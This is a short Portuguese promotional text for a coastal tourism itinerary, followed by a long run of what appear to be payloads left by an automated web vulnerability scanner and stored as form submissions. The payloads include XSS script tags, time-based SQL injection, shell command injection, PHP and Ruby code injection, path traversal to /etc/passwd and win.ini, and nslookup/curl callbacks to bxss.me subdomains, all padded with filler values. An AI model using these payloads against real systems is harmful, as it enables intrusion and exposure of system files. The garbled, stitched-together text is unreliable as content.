Embarcar nessa aventura é descobrir monumentais falésias, contemplar a natureza singular das praias, se refrescar em águas calmas, sentir a brisa no rosto, praticar kitesurf, vivenciar a experiência da pesca da lagosta e desfrutar de um mergulho livre assistido!
Conhecer edificações históricas e casas de alpendre que guardam marcas de um passado, ouvir histórias e apreciar a gastronomia caiçara, uma imersão na nossa cultura.
Respirar o ar marinho, ouvir os sons da natureza, sentir a textura das praias, mangues e falésias, se encantar com espécies raras da fauna marinha ou com um majestoso pôr do sol! É assim que você poderá desfrutar deste roteiro.
Interagir para descobrir estórias e causos, um jeito simples de receber e acolher. Sinta-se em casa e descubra uma gente que se orgulha e sente o prazer em contar a sua rica história.
555
1
555
1
555
1
555
16FB58QV90
555
1
1BGPP4VCDA0
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
1
555
1
555
xfs.bxss.me
555
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
1
555
'"
555
1
xfs.bxss.me
1
555
1
555
<!--
555
1
555
1
'"
1
555
1
555
1
555
1
<!--
1
555
1
555
1
555
1
555
1
555
1'"()&%<zzz><ScRiPt >xAO2(9446)</ScRiPt>
555
1
555
1
555
555
response.write(9260552*9115669)
555
1
555
1
555
1
555
1
555
'+response.write(9260552*9115669)+'
555
echo jwhufs$()\ romkqh\nz^xyu||a #' &echo jwhufs$()\ romkqh\nz^xyu||a #|" &echo jwhufs$()\ romkqh\nz^xyu||a #
555
'"()&%<zzz><ScRiPt >xAO2(9259)</ScRiPt>
555
1
555
1
555
12345'"\'\");|]*{ <>?''????
555
&echo zldcmb$()\ ruarsn\nz^xyu||a #' &echo zldcmb$()\ ruarsn\nz^xyu||a #|" &echo zldcmb$()\ ruarsn\nz^xyu||a #
555
19747022
555
555
1
555
1&echo grjlie$()\ qtjlpj\nz^xyu||a #' &echo grjlie$()\ qtjlpj\nz^xyu||a #|" &echo grjlie$()\ qtjlpj\nz^xyu||a #
555
1
555
"+response.write(9260552*9115669)+"
555
1
555
|echo ngkvux$()\ xrzsic\nz^xyu||a #' |echo ngkvux$()\ xrzsic\nz^xyu||a #|" |echo ngkvux$()\ xrzsic\nz^xyu||a #
555'"()&%<zzz><ScRiPt >xAO2(9618)</ScRiPt>
1
555
jevTfCXw
555
1
555
1|echo ojdxvk$()\ pwbobv\nz^xyu||a #' |echo ojdxvk$()\ pwbobv\nz^xyu||a #|" |echo ojdxvk$()\ pwbobv\nz^xyu||a #
response.write(9525704*9520225)
1
555
../../../../../../../../../../../../../../etc/passwd
555
expr 9000645425 - 968610
555
1Vdw0n8sM
'"()&%<zzz><ScRiPt >xAO2(9261)</ScRiPt>
1
555
../../../../../../../../../../../../../../windows/win.ini
555
1
12345'"\'\");|]*{ <>?''????
1
'+response.write(9525704*9520225)+'
1
555
(nslookup -q=cname hithyicsfxgmq96c59.bxss.me||curl hithyicsfxgmq96c59.bxss.me))
5559998586
1
555
1
555
file:///etc/passwd
555
1
555
1
"+response.write(9525704*9520225)+"
1
555
1
555
QA1ttiQ9: IcKKs8wT
555
1
555
1
555
1NLTh4VPc
555
1
555
1
555
1
555
1
555
1
555
$(nslookup -q=cname hithzrlvmupvvd42a4.bxss.me||curl hithzrlvmupvvd42a4.bxss.me)
555
../1
555
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
rNIyILPe
1
555
&nslookup -q=cname hitfjwftitfbe93b74.bxss.me&'\"`0&nslookup -q=cname hitfjwftitfbe93b74.bxss.me&`'
555
1
555
1
555
1
../../../../../../../../../../../../../../windows/win.ini
1
oHUJlSff: 41RBDapb
1
555
1
555
&(nslookup -q=cname hitkfqlsuhvmc5444d.bxss.me||curl hitkfqlsuhvmc5444d.bxss.me)&'\"`0&(nslookup -q=cname hitkfqlsuhvmc5444d.bxss.me||curl hitkfqlsuhvmc5444d.bxss.me)&`'
555
1
555
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
1
file:///etc/passwd
1
555
${9999698+9999927}
555
|(nslookup -q=cname hitnxyszshajl49521.bxss.me||curl hitnxyszshajl49521.bxss.me)
555
1
555
1
555
1
555
1
555
-1 OR 5*5=25 --
${10000409+9999299}
1
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
`(nslookup -q=cname hitveoopukxms8e805.bxss.me||curl hitveoopukxms8e805.bxss.me)`
555
-1 OR 5*5=25
555
1
555
1
555
-1 OR 5*5=25 --
555
1
555
1
555
1
555
-1' OR 5*5=25 --
555
;(nslookup -q=cname hityafyxpwqsqda503.bxss.me||curl hityafyxpwqsqda503.bxss.me)|(nslookup -q=cname hityafyxpwqsqda503.bxss.me||curl hityafyxpwqsqda503.bxss.me)&(nslookup -q=cname hityafyxpwqsqda5
555
1
../555
1
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitgchvtnkjda1dafd.bxss.me||curl${IFS}hitgchvtnkjda1dafd.bxss.me)
555
1
555
-1 OR 5*5=25
555
-1" OR 5*5=25 --
555
';print(md5(31337));$a='
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hituhtocdtnwjf9eaa.bxss.me||curl${IFS}hituhtocdtnwjf9eaa.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hituhtocdtnwjf9eaa.bxss.me||curl${IFS}h
555
1
555
1
555
1
555
-1' OR 5*5=25 --
555
1
555
1
555
1
555
'.gethostbyname(lc('hitae'.'iamktayu8628d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(81).chr(107).chr(71).'
555
-1' OR 5*5=25 or 'CpCZrU16'='
555
";print(md5(31337));$a="
555
1
555
1
555
1
echo hsiqwx$()\ wanupf\nz^xyu||a #' &echo hsiqwx$()\ wanupf\nz^xyu||a #|" &echo hsiqwx$()\ wanupf\nz^xyu||a #
1
555
1
555
${@print(md5(31337))}
555
1
555
".gethostbyname(lc("hitpi"."ihhdavgh940e5.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(74).chr(120).chr(81)."
555
-1" OR 5*5=25 or "LsvKv1NX"="
555
1
555
1
555
1
555
1
&echo eixnfk$()\ bkxvqg\nz^xyu||a #' &echo eixnfk$()\ bkxvqg\nz^xyu||a #|" &echo eixnfk$()\ bkxvqg\nz^xyu||a #
1
555
1
555
1
555
-1" OR 5*5=25 --
555
${@print(md5(31337))}\
555
1
555
gethostbyname(lc('hitho'.'ncezgmlaff3a7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(65).chr(107).chr(76)
555
1*if(now()=sysdate(),sleep(15),0)
555
1
555
1
555&echo cpbihp$()\ brzmag\nz^xyu||a #' &echo cpbihp$()\ brzmag\nz^xyu||a #|" &echo cpbihp$()\ brzmag\nz^xyu||a #
1
555
'.print(md5(31337)).'
555
1
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
-1' OR 5*5=25 or 'o1vNJfHO'='
555
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
1
555
1
555
1
|echo zwvumy$()\ gfngjb\nz^xyu||a #' |echo zwvumy$()\ gfngjb\nz^xyu||a #|" |echo zwvumy$()\ gfngjb\nz^xyu||a #
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
'.gethostbyname(lc('hitqm'.'fxjqiwoa46634.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(66).chr(119).chr(80).'
1
555
1
555
1
555
-1" OR 5*5=25 or "647jFAtM"="
555
1
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
';print(md5(31337));$a='
1
555
1
555
1
555|echo padtcc$()\ msfkay\nz^xyu||a #' |echo padtcc$()\ msfkay\nz^xyu||a #|" |echo padtcc$()\ msfkay\nz^xyu||a #
1
555
HttP://bxss.me/t/xss.html?%00
555
1
555
1
555
1
".gethostbyname(lc("hitsw"."fmbbcvvbfa449.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(74).chr(97).chr(73)."
1
555
1*if(now()=sysdate(),sleep(15),0)
";print(md5(31337));$a="
1
555
1
555
1
555
1
expr 9000381849 - 924906
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
gethostbyname(lc('hituw'.'cpvymlowd0371.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(77).chr(108).chr(90)
1
555
1
555
1-1; waitfor delay '0:0:15' --
555
1
555
bxss.me/t/xss.html?%00
555
1
(nslookup -q=cname hitlksgedzyka6b732.bxss.me||curl hitlksgedzyka6b732.bxss.me))
1
${@print(md5(31337))}
1
555
1
555
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
HttP://bxss.me/t/xss.html?%00
1
555
1
555
1
555
1
555
1
555
/etc/shells
555
1
555
1
bxss.me/t/xss.html?%00
1
555
"+"A".concat(70-3).concat(22*4).concat(105).concat(68).concat(109).concat(89)+(require"socket" Socket.gethostbyname("hitgd"+"yaskcdqbeddbd.bxss.me.")[3].to_s)+&
$(nslookup -q=cname hitdrhbypgifsef911.bxss.me||curl hitdrhbypgifsef911.bxss.me)
1
${@print(md5(31337))}\
1
555
../../../../../../../../../../../../../../etc/shells
555
1
555
1
555
1
555
'+'A'.concat(70-3).concat(22*4).concat(97).concat(87).concat(113).concat(80)+(require'socket' Socket.gethostbyname('hitkx'+'zbvxnmpw6f7d4.bxss.me.')[3].to_s)+
&nslookup -q=cname hithjieocsrlofba1e.bxss.me&'\"`0&nslookup -q=cname hithjieocsrlofba1e.bxss.me&`'
1
'.print(md5(31337)).'
1
555
c:/windows/win.ini
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
555
'A'.concat(70-3).concat(22*4).concat(115).concat(83).concat(110).concat(69)+(require'socket' Socket.gethostbyname('hitgt'+'wnshdyhw503dc.bxss.me.')[3].to_s)
&(nslookup -q=cname hitnttyzglwuq1487b.bxss.me||curl hitnttyzglwuq1487b.bxss.me)&'\"`0&(nslookup -q=cname hitnttyzglwuq1487b.bxss.me||curl hitnttyzglwuq1487b.bxss.me)&`'
1
555
1
555
bxss.me
555
depoimentos
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(113).concat(79).concat(112).concat(82)+(require"socket" Socket.gethostbyname("hitmu"+"ojcyynvi9b139.bxss.me.")[3].to_s)+"
1
|(nslookup -q=cname hitlcktpplkte53e80.bxss.me||curl hitlcktpplkte53e80.bxss.me)
1
555
1
555
1
555
1
555
Http://bxss.me/t/fit.txt
555
1
555
depoimentos/.
555
1
`(nslookup -q=cname hitszduvblrdqc9b27.bxss.me||curl hitszduvblrdqc9b27.bxss.me)`
1
'+'A'.concat(70-3).concat(22*4).concat(121).concat(90).concat(97).concat(90)+(require'socket' Socket.gethostbyname('hitmy'+'perswtmo59bf3.bxss.me.')[3].to_s)+'
1
555
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
depoimentos
1
;(nslookup -q=cname hitrjorqecejob39d2.bxss.me||curl hitrjorqecejob39d2.bxss.me)|(nslookup -q=cname hitrjorqecejob39d2.bxss.me||curl hitrjorqecejob39d2.bxss.me)&(nslookup -q=cname hitrjorqecejob39d2.bxss.me||curl hitrjorqecejob39d2.bxss.me)
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
'A'.concat(70-3).concat(22*4).concat(100).concat(72).concat(122).concat(73)+(require'socket' Socket.gethostbyname('hitst'+'dmjzfiuwe0ceb.bxss.me.')[3].to_s)
1
555
1-1 waitfor delay '0:0:15' --
555
1
depoimentos
1
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hiteshdrdnpdqa1ee6.bxss.me||curl${IFS}hiteshdrdnpdqa1ee6.bxss.me)
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
depoimentos/.
1
555
1
555
1
555
1
555
1
/etc/shells
1
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitiidtypagvhb6fd5.bxss.me||curl${IFS}hitiidtypagvhb6fd5.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitiidtypagvhb6fd5.bxss.me||curl${IFS}hitiidtypagvhb6fd5.bxss.me)&`'
1
555
1
555
1
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
redirtest.acx
555
1
555
18fHcvwJL'; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
c:/windows/win.ini
1
555
1
555
1
555
1
redirtest.acx
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
bxss.me
1
555
1
555
1
555
1
555
1-1; waitfor delay '0:0:15' --
555
1
Http://bxss.me/t/fit.txt
1
555
1
555
1
555
1
555
1
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
1
555
1
555
1
555
1
555
1&n985167=v958404
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1 OR 693=(SELECT 693 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555&n990584=v985928
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1) OR 897=(SELECT 897 FROM PG_SLEEP(15))--
555
1
555
)
555
1
555
1
555
1
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
1
555
1
555
^(#$!@#$)(()))******
555
1
555
1
555
1
)
1
555
1
555
555
1
555
1
555
1
555
1
555
1-1 waitfor delay '0:0:15' --
!(()&&!|*|*|
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1-1)) OR 42=(SELECT 42 FROM PG_SLEEP(15))--
555
1
555
1
^(#$!@#$)(()))******
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
1
555
1
555
1
555
1
555
'"()
555
xfs.bxss.me
555
1
555
1
555
1'&&sleep(27*1000)*xmqykd&&'
555
1
xfs.bxss.me
1
555
1rZfkMYoa'; waitfor delay '0:0:15' --
555
1
555
1
555
'"
555
1
555
1
555
1
555
18tEpTqqr' OR 912=(SELECT 912 FROM PG_SLEEP(15))--
555
1
555
1
555
<!--
555
1
555
1"&&sleep(27*1000)*ijctlt&&"
555
1
555
1
555
1-1 OR 49=(SELECT 49 FROM PG_SLEEP(15))--
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
1'"()&%<zzz><ScRiPt >jYIx(9869)</ScRiPt>
555
1
555
1
555
'"()&%<zzz><ScRiPt >jYIx(9535)</ScRiPt>
555
1
555
1konIbOpm') OR 124=(SELECT 124 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
'"
1
555
1'||sleep(27*1000)*blaliw||'
555
1
555
1
555
1
555
19323820
555
1"||sleep(27*1000)*qfadpw||"
<!--
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555'"()&%<zzz><ScRiPt >jYIx(9631)</ScRiPt>
1
555
1
555
1
555
1
555
1
555
1-1) OR 133=(SELECT 133 FROM PG_SLEEP(15))--
555
1
'"()&%<zzz><ScRiPt >jYIx(9222)</ScRiPt>
1
555
555
1
555
1LNAM5TAa')) OR 990=(SELECT 990 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
5559934777
1
555
1
555
response.write(9725452*9782912)
'"()
1
555
1
555
'+response.write(9725452*9782912)+'
555
1
555
1
555
1
555
1
555
12345'"\'\");|]*{ <>?''????
555
1
555
1
555
"+response.write(9725452*9782912)+"
555
1-1)) OR 49=(SELECT 49 FROM PG_SLEEP(15))--
555'&&sleep(27*1000)*wczehc&&'
1
555
555
1
555
1
response.write(9108350*9469451)
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
echo pwnjvw$()\ nwxalk\nz^xyu||a #' &echo pwnjvw$()\ nwxalk\nz^xyu||a #|" &echo pwnjvw$()\ nwxalk\nz^xyu||a #
555
1
555
1
555
1
555"&&sleep(27*1000)*xzeudi&&"
1
555
1
555
&echo lklguu$()\ etegoy\nz^xyu||a #' &echo lklguu$()\ etegoy\nz^xyu||a #|" &echo lklguu$()\ etegoy\nz^xyu||a #
555
2U7Arrqf
555
1
555
1
555'||sleep(27*1000)*uwvpie||'
1
555
1
12345'"\'\");|]*{ <>?''????
1
555
1
'+response.write(9108350*9469451)+'
1
555"||sleep(27*1000)*natilp||"
1
555
1
555
1
555
1
555
MDVjp2eU: NEcfRCxv
555
1
555
1&echo iybmds$()\ jsnjof\nz^xyu||a #' &echo iybmds$()\ jsnjof\nz^xyu||a #|" &echo iybmds$()\ jsnjof\nz^xyu||a #
"+response.write(9108350*9469451)+"
1
555
1
555
1MY2An8bD' OR 881=(SELECT 881 FROM PG_SLEEP(15))--
555
1
555
1
555
|echo xppsbj$()\ kttzal\nz^xyu||a #' |echo xppsbj$()\ kttzal\nz^xyu||a #|" |echo xppsbj$()\ kttzal\nz^xyu||a #
555
1
eqKnoKXK
1
555
1
555
1
555
1
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1
555
1
555
1
PTcOdpSC: BydVxhh2
1
555
1
555
1|echo xtfsqj$()\ oimysq\nz^xyu||a #' |echo xtfsqj$()\ oimysq\nz^xyu||a #|" |echo xtfsqj$()\ oimysq\nz^xyu||a #
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1g1O4s2Fd') OR 110=(SELECT 110 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
expr 9000257584 - 940876
555
1
555
1
555
1
555
1
555
1'"
555
1
555
1
555
1
555
1
555
1
555
1????%2527%2522\'\"
555
(nslookup -q=cname hitwqluuovidzf4ae1.bxss.me||curl hitwqluuovidzf4ae1.bxss.me))
555
1
555
1
555
1
555
1
555
1
555
1
555
@@kTWbp
555
1
555
1
555
1
555
1
555
1
555
(select 198766*667891)
555
1
555
1
555
../../../../../../../../../../../../../../etc/passwd
555
1
555
1
555
$(nslookup -q=cname hitgvcorkiqlkf2f58.bxss.me||curl hitgvcorkiqlkf2f58.bxss.me)
555
1
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1U9lUlBM4')) OR 607=(SELECT 607 FROM PG_SLEEP(15))--
555
../../../../../../../../../../../../../../windows/win.ini
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
&nslookup -q=cname hitgcligaqfnv63ea5.bxss.me&'\"`0&nslookup -q=cname hitgcligaqfnv63ea5.bxss.me&`'
555
${9999928+9999421}
555
1
555
1
555
1
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
1
555
1
555
file:///etc/passwd
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
&(nslookup -q=cname hitzsrguxuqyr98ca4.bxss.me||curl hitzsrguxuqyr98ca4.bxss.me)&'\"`0&(nslookup -q=cname hitzsrguxuqyr98ca4.bxss.me||curl hitzsrguxuqyr98ca4.bxss.me)&`'
555
1
${10000109+9999441}
1
555
1
555
1
555
1
555
1
555
1
555
';print(md5(31337));$a='
555
|(nslookup -q=cname hititpsleiulo29a28.bxss.me||curl hititpsleiulo29a28.bxss.me)
555
1
555
1
555
1
555
1
555
1
555
1
555
`(nslookup -q=cname hitsakweaefuve09b9.bxss.me||curl hitsakweaefuve09b9.bxss.me)`
555
1
555
1
555
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1
555
";print(md5(31337));$a="
555
1
555
;(nslookup -q=cname hittbdecjzont25f83.bxss.me||curl hittbdecjzont25f83.bxss.me)|(nslookup -q=cname hittbdecjzont25f83.bxss.me||curl hittbdecjzont25f83.bxss.me)&(nslookup -q=cname hittbdecjzont25f
555
1
555
1
555
../1
555
1
555
1
555
${@print(md5(31337))}
555
1
555
1
555
1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitefpldwmajff466c.bxss.me||curl${IFS}hitefpldwmajff466c.bxss.me)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hiteybtkmuadlcc157.bxss.me||curl${IFS}hiteybtkmuadlcc157.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hiteybtkmuadlcc157.bxss.me||curl${IFS}h
555
1
555
1
555
1
../../../../../../../../../../../../../../windows/win.ini
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
${@print(md5(31337))}\
555
1
555
1
555
1
555
1
file:///etc/passwd
1
555
'.gethostbyname(lc('hitgz'.'txrdzkul26c0c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(76).chr(116).chr(86).'
555
1
555
'.print(md5(31337)).'
555
1
555
1
555
1
echo qrhggj$()\ frfend\nz^xyu||a #' &echo qrhggj$()\ frfend\nz^xyu||a #|" &echo qrhggj$()\ frfend\nz^xyu||a #
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
555
1
555
1
555wmqlGEBH
1
&echo lhdpnu$()\ wpfwoa\nz^xyu||a #' &echo lhdpnu$()\ wpfwoa\nz^xyu||a #|" &echo lhdpnu$()\ wpfwoa\nz^xyu||a #
1
555
1'"
555
".gethostbyname(lc("hithj"."ukguuoju0d6ca.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(85).chr(108).chr(85)."
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
1
555
1
../555
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
1
555&echo cyodlw$()\ ccbfzc\nz^xyu||a #' &echo cyodlw$()\ ccbfzc\nz^xyu||a #|" &echo cyodlw$()\ ccbfzc\nz^xyu||a #
1
555
1????%2527%2522\'\"
555
1
555
1
';print(md5(31337));$a='
1
555
1
555
1
555
/etc/shells
-1 OR 5*5=25 --
1
555
gethostbyname(lc('hityx'.'eyhuuenn39958.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(69).chr(118).chr(76)
555
1
555
1
555
1
|echo lmqniy$()\ cviydb\nz^xyu||a #' |echo lmqniy$()\ cviydb\nz^xyu||a #|" |echo lmqniy$()\ cviydb\nz^xyu||a #
1
555
1
";print(md5(31337));$a="
1
555
HttP://bxss.me/t/xss.html?%00
'.gethostbyname(lc('hitpq'.'tsbvefaxc169d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(80).chr(98).chr(81).'
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/shells
555
1
555|echo xfykxu$()\ gznxbo\nz^xyu||a #' |echo xfykxu$()\ gznxbo\nz^xyu||a #|" |echo xfykxu$()\ gznxbo\nz^xyu||a #
1
555
bxss.me/t/xss.html?%00
-1 OR 5*5=25
1
555
1
555
1
555
c:/windows/win.ini
555
1
HttP://bxss.me/t/xss.html?%00
1
${@print(md5(31337))}
1
555
1
".gethostbyname(lc("hitsn"."ufzmfmjide64f.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(74).chr(112).chr(86)."
1
555
@@pNRec
expr 9000110423 - 912285
1
555
1
555
1
555
1
555
1
555
(select 198766*667891)
555
1
-1' OR 5*5=25 --
1
${@print(md5(31337))}\
1
555
1
gethostbyname(lc('hitpp'.'wzasliwtc62d2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(84).chr(122).chr(89)
1
(nslookup -q=cname hitofslkenqmf89116.bxss.me||curl hitofslkenqmf89116.bxss.me))
1
555
1
555
1
555
1
555
bxss.me
bxss.me/t/xss.html?%00
1
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1
$(nslookup -q=cname hithlpuaasadr9ed18.bxss.me||curl hithlpuaasadr9ed18.bxss.me)
1
-1" OR 5*5=25 --
1
555
Http://bxss.me/t/fit.txt
555
1
555
1
555
1
'.print(md5(31337)).'
1
555
1
555
1
555
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
555
1
555
1
555
1
&nslookup -q=cname hitheyxjywzyge6481.bxss.me&'\"`0&nslookup -q=cname hitheyxjywzyge6481.bxss.me&`'
1
555
1
555
1
555
1
555
1
555
1
-1' OR 5*5=25 or 'ENqy6yFs'='
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
"+"A".concat(70-3).concat(22*4).concat(102).concat(70).concat(101).concat(75)+(require"socket" Socket.gethostbyname("hittb"+"phrqvtvm8705d.bxss.me.")[3].to_s)+&
555
1
&(nslookup -q=cname hitekhrkulizg23ebd.bxss.me||curl hitekhrkulizg23ebd.bxss.me)&'\"`0&(nslookup -q=cname hitekhrkulizg23ebd.bxss.me||curl hitekhrkulizg23ebd.bxss.me)&`'
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
depoimentos
-1" OR 5*5=25 or "QYXu4rfF"="
1
555
1
555
'+'A'.concat(70-3).concat(22*4).concat(100).concat(90).concat(105).concat(69)+(require'socket' Socket.gethostbyname('hiths'+'qijglgsob2ba0.bxss.me.')[3].to_s)+&
555
1
|(nslookup -q=cname hitumrthinmap0aa9e.bxss.me||curl hitumrthinmap0aa9e.bxss.me)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
'A'.concat(70-3).concat(22*4).concat(119).concat(84).concat(107).concat(85)+(require'socket' Socket.gethostbyname('hitda'+'aurhsaojca7bc.bxss.me.')[3].to_s)
555
1
555
1
555
1
555
1
`(nslookup -q=cname hitpaldhzkdbmdd8d0.bxss.me||curl hitpaldhzkdbmdd8d0.bxss.me)`
1
/etc/shells
1
555
1
555
1
555
depoimentos/.
555
1
555
1
555
1
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(116).concat(85).concat(100).concat(73)+(require"socket" Socket.gethostbyname("hityr"+"vlhphsne01ef0.bxss.me.")[3].to_s)+"
1
555*if(now()=sysdate(),sleep(15),0)
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
;(nslookup -q=cname hitqfbpejqzqg3a83a.bxss.me||curl hitqfbpejqzqg3a83a.bxss.me)|(nslookup -q=cname hitqfbpejqzqg3a83a.bxss.me||curl hitqfbpejqzqg3a83a.bxss.me)&(nslookup -q=cname hitqfbpejqzqg3a83a.bxss.me||curl hitqfbpejqzqg3a83a.bxss.me)
1
555
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(111).concat(82).concat(100).concat(66)+(require'socket' Socket.gethostbyname('hitvi'+'vbfyyzmcb4805.bxss.me.')[3].to_s)+'
1
c:/windows/win.ini
1
555
1
555
1
555
1
555mEpUl0P5
1
depoimentos
1
555
1
555
1
555
1
555
1
depoimentos
1
555
1
'A'.concat(70-3).concat(22*4).concat(121).concat(70).concat(115).concat(75)+(require'socket' Socket.gethostbyname('hitvx'+'sovdijac52377.bxss.me.')[3].to_s)
1
555
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
bxss.me
1
555
1
555
1
555
1
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitrxwpzdjyzh74bae.bxss.me||curl${IFS}hitrxwpzdjyzh74bae.bxss.me)
1
-1 OR 5*5=25 --
1
555
1
555
1
555
1
555
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
1
555
1
555
1
555
1
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitxuxblnaxatc558a.bxss.me||curl${IFS}hitxuxblnaxatc558a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitxuxblnaxatc558a.bxss.me||curl${IFS}hitxuxblnaxatc558a.bxss.me)&`'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
Http://bxss.me/t/fit.txt
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1
555
1
555
1
-1 OR 5*5=25
1
555
1
555
1
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1 waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555831wyRCN'; waitfor delay '0:0:15' --
1
555
1
555
1
555
redirtest.acx
555
1
555
1
-1' OR 5*5=25 --
1
555
1
